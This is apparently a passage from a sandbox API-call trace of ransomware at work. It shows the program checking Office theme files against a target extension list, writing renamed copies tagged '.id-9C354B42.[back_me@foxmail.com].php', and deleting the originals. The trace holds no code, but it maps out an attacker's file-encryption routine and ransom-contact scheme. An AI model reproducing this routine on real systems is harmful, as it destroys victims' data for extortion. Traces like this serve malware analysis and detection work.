[0249.813] lstrlenW (lpString=".ppt") returned 4 [0249.813] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.813] lstrlenW (lpString=".zip") returned 4 [0249.813] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString=".rar") returned 4 [0249.813] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString=".bz2") returned 4 [0249.813] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0249.813] lstrlenW (lpString=".7z") returned 3 [0249.813] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0249.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.814] lstrlenW (lpString=".dbf") returned 4 [0249.814] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0249.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.814] lstrlenW (lpString=".1cd") returned 4 [0249.814] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0249.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned 79 [0249.814] lstrlenW (lpString=".jpg") returned 4 [0249.814] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0249.814] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0249.814] lstrlenW (lpString="Elemental.eftx") returned 14 [0249.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0249.815] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=314017) returned 1 [0249.815] CloseHandle (hObject=0x3ac) returned 1 [0249.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 0x20 [0249.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0249.815] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.816] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0249.816] GetLastError () returned 0x0 [0249.816] ReadFile (in: hFile=0x3ac, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x4caa1, lpOverlapped=0x0) returned 1 [0249.982] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x4cab0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x4cab0, lpOverlapped=0x0) returned 1 [0249.988] ReadFile (in: hFile=0x3ac, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0249.988] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0249.988] SetEndOfFile (hFile=0x390) returned 1 [0250.004] CloseHandle (hObject=0x390) returned 1 [0250.004] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0250.004] SetEndOfFile (hFile=0x3ac) returned 1 [0250.013] CloseHandle (hObject=0x3ac) returned 1 [0250.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0250.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx")) returned 1 [0250.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.014] lstrlenW (lpString=".doc") returned 4 [0250.014] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0250.014] lstrlenW (lpString=".docx") returned 5 [0250.014] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0250.014] lstrlenW (lpString=".pdf") returned 4 [0250.014] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0250.014] lstrlenW (lpString=".xls") returned 4 [0250.014] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0250.014] lstrlenW (lpString=".xlsx") returned 5 [0250.014] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0250.014] lstrlenW (lpString=".ppt") returned 4 [0250.014] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.015] lstrlenW (lpString=".zip") returned 4 [0250.015] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString=".rar") returned 4 [0250.015] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString=".bz2") returned 4 [0250.015] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString=".7z") returned 3 [0250.015] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0250.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.015] lstrlenW (lpString=".dbf") returned 4 [0250.015] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.015] lstrlenW (lpString=".1cd") returned 4 [0250.015] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.015] lstrlenW (lpString=".jpg") returned 4 [0250.015] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.015] lstrlenW (lpString=".doc") returned 4 [0250.015] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString=".docx") returned 5 [0250.015] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0250.015] lstrlenW (lpString=".pdf") returned 4 [0250.015] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString=".xls") returned 4 [0250.015] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0250.015] lstrlenW (lpString=".xlsx") returned 5 [0250.015] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0250.016] lstrlenW (lpString=".ppt") returned 4 [0250.016] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0250.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.016] lstrlenW (lpString=".zip") returned 4 [0250.016] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0250.016] lstrlenW (lpString=".rar") returned 4 [0250.016] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0250.016] lstrlenW (lpString=".bz2") returned 4 [0250.016] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0250.016] lstrlenW (lpString=".7z") returned 3 [0250.016] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0250.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.016] lstrlenW (lpString=".dbf") returned 4 [0250.016] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0250.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.016] lstrlenW (lpString=".1cd") returned 4 [0250.016] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0250.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned 81 [0250.016] lstrlenW (lpString=".jpg") returned 4 [0250.016] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0250.016] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0250.016] lstrlenW (lpString="Equity.eftx") returned 11 [0250.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0250.770] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=24611) returned 1 [0250.770] CloseHandle (hObject=0x370) returned 1 [0250.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 0x20 [0250.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0250.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0250.771] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0250.771] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0250.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0250.771] GetLastError () returned 0x0 [0250.771] ReadFile (in: hFile=0x370, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x6023, lpOverlapped=0x0) returned 1 [0250.774] WriteFile (in: hFile=0x380, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x6030, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x6030, lpOverlapped=0x0) returned 1 [0250.775] ReadFile (in: hFile=0x370, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0250.775] WriteFile (in: hFile=0x380, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0250.775] SetEndOfFile (hFile=0x380) returned 1 [0250.775] CloseHandle (hObject=0x380) returned 1 [0250.775] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0250.775] SetEndOfFile (hFile=0x370) returned 1 [0250.779] CloseHandle (hObject=0x370) returned 1 [0250.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0250.780] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 1 [0250.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.780] lstrlenW (lpString=".doc") returned 4 [0250.780] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0250.780] lstrlenW (lpString=".docx") returned 5 [0250.780] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0250.780] lstrlenW (lpString=".pdf") returned 4 [0250.780] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0250.780] lstrlenW (lpString=".xls") returned 4 [0250.780] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0250.780] lstrlenW (lpString=".xlsx") returned 5 [0250.780] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0250.781] lstrlenW (lpString=".ppt") returned 4 [0250.781] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.781] lstrlenW (lpString=".zip") returned 4 [0250.781] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString=".rar") returned 4 [0250.781] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString=".bz2") returned 4 [0250.781] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString=".7z") returned 3 [0250.781] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0250.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.781] lstrlenW (lpString=".dbf") returned 4 [0250.781] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.781] lstrlenW (lpString=".1cd") returned 4 [0250.781] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.781] lstrlenW (lpString=".jpg") returned 4 [0250.781] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.781] lstrlenW (lpString=".doc") returned 4 [0250.781] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0250.781] lstrlenW (lpString=".docx") returned 5 [0250.781] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0250.781] lstrlenW (lpString=".pdf") returned 4 [0250.782] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0250.782] lstrlenW (lpString=".xls") returned 4 [0250.782] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0250.782] lstrlenW (lpString=".xlsx") returned 5 [0250.782] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0250.782] lstrlenW (lpString=".ppt") returned 4 [0250.782] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0250.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.782] lstrlenW (lpString=".zip") returned 4 [0250.782] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0250.782] lstrlenW (lpString=".rar") returned 4 [0250.782] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0250.782] lstrlenW (lpString=".bz2") returned 4 [0250.782] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0250.782] lstrlenW (lpString=".7z") returned 3 [0250.782] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0250.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.782] lstrlenW (lpString=".dbf") returned 4 [0250.782] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0250.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.783] lstrlenW (lpString=".1cd") returned 4 [0250.783] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0250.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0250.783] lstrlenW (lpString=".jpg") returned 4 [0250.783] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0250.783] lstrcmpiW (lpString1=".eftx", lpString2=".php") returned -1 [0250.783] lstrlenW (lpString="Perspective.eftx") returned 16 [0250.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0250.784] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=21423) returned 1 [0250.784] CloseHandle (hObject=0x370) returned 1 [0250.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 0x20 [0250.784] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0250.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0250.784] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0250.784] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0250.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0250.784] GetLastError () returned 0x0 [0250.785] ReadFile (in: hFile=0x370, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x53af, lpOverlapped=0x0) returned 1 [0250.787] WriteFile (in: hFile=0x380, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x53b0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x53b0, lpOverlapped=0x0) returned 1 [0250.788] ReadFile (in: hFile=0x370, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0250.788] WriteFile (in: hFile=0x380, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0250.788] SetEndOfFile (hFile=0x380) returned 1 [0251.024] CloseHandle (hObject=0x380) returned 1 [0251.024] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.024] SetEndOfFile (hFile=0x370) returned 1 [0251.156] CloseHandle (hObject=0x370) returned 1 [0251.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 1 [0251.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.178] lstrlenW (lpString=".doc") returned 4 [0251.178] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0251.178] lstrlenW (lpString=".docx") returned 5 [0251.178] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0251.178] lstrlenW (lpString=".pdf") returned 4 [0251.178] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0251.178] lstrlenW (lpString=".xls") returned 4 [0251.178] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0251.178] lstrlenW (lpString=".xlsx") returned 5 [0251.178] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0251.178] lstrlenW (lpString=".ppt") returned 4 [0251.178] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0251.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.178] lstrlenW (lpString=".zip") returned 4 [0251.179] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString=".rar") returned 4 [0251.179] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString=".bz2") returned 4 [0251.179] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString=".7z") returned 3 [0251.179] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0251.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.179] lstrlenW (lpString=".dbf") returned 4 [0251.179] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.179] lstrlenW (lpString=".1cd") returned 4 [0251.179] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.179] lstrlenW (lpString=".jpg") returned 4 [0251.179] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.179] lstrlenW (lpString=".doc") returned 4 [0251.179] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString=".docx") returned 5 [0251.179] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0251.179] lstrlenW (lpString=".pdf") returned 4 [0251.179] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString=".xls") returned 4 [0251.179] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0251.179] lstrlenW (lpString=".xlsx") returned 5 [0251.179] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0251.179] lstrlenW (lpString=".ppt") returned 4 [0251.180] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0251.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.180] lstrlenW (lpString=".zip") returned 4 [0251.180] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0251.180] lstrlenW (lpString=".rar") returned 4 [0251.180] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0251.180] lstrlenW (lpString=".bz2") returned 4 [0251.180] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0251.180] lstrlenW (lpString=".7z") returned 3 [0251.180] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0251.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0251.180] lstrlenW (lpString=".dbf") returned 4 [0251.180] 